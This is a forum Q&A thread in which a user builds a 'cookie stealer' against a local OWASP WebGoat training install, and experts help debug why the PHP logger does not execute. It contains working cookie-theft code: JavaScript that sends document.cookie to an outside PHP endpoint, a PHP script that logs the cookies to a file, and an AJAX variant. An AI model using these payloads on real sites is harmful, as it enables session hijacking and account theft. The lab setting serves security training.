Solved

How to call a PHP script from Javascript in HTML

Posted on 2014-11-16
13
117 Views
Last Modified: 2014-11-18
Hello experts,
 
  I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>

Open in new window


cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

Open in new window


  This is probably something silly I'm overlooking.  Any ideas?
0
Comment
Question by:dilligent
  • 5
  • 4
  • 4
13 Comments
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 40445772
We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!
0
 

Author Comment

by:dilligent
ID: 40445777
This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.
0
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 40445784
For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;

Open in new window


And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

Open in new window

0
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 40445785
Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.
0
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 40445789
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Open in new window

Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

Open in new window

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.
0
 

Author Comment

by:dilligent
ID: 40445846
I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parametersview sourceview URL encoded
cookie:**********************
Response Headersview source
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
0
Maximize Your Threat Intelligence Reporting

Reporting is one of the most important and least talked about aspects of a world-class threat intelligence program. Here’s how to do it right.

 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 40445904
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.
0
 

Author Comment

by:dilligent
ID: 40446024
Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal reponse back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
0
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 40446193
I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.
0
 

Author Comment

by:dilligent
ID: 40446223
Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.
0
 
LVL 82

Accepted Solution

by:
Dave Baldwin earned 500 total points
ID: 40446279
Standard Apache installs have some extra code that tells them when to run PHP code thru the PHP interpreter, it is not automatic.  If PHP is already installed on the server, it's the part that tells the web server to use the PHP interpreter to run the PHP code that you need.
0
 

Author Closing Comment

by:dilligent
ID: 40449925
Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.
0
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 40450659
You're welcome.
0

Featured Post

How your wiki can always stay up-to-date

Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

Join & Write a Comment

Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
This article demonstrates how to create a simple responsive confirmation dialog with Ok and Cancel buttons using HTML, CSS, jQuery and Promises
The viewer will learn how to look for a specific file type in a local or remote server directory using PHP.
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

747 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

13 Experts available now in Live!

Get 1:1 Help Now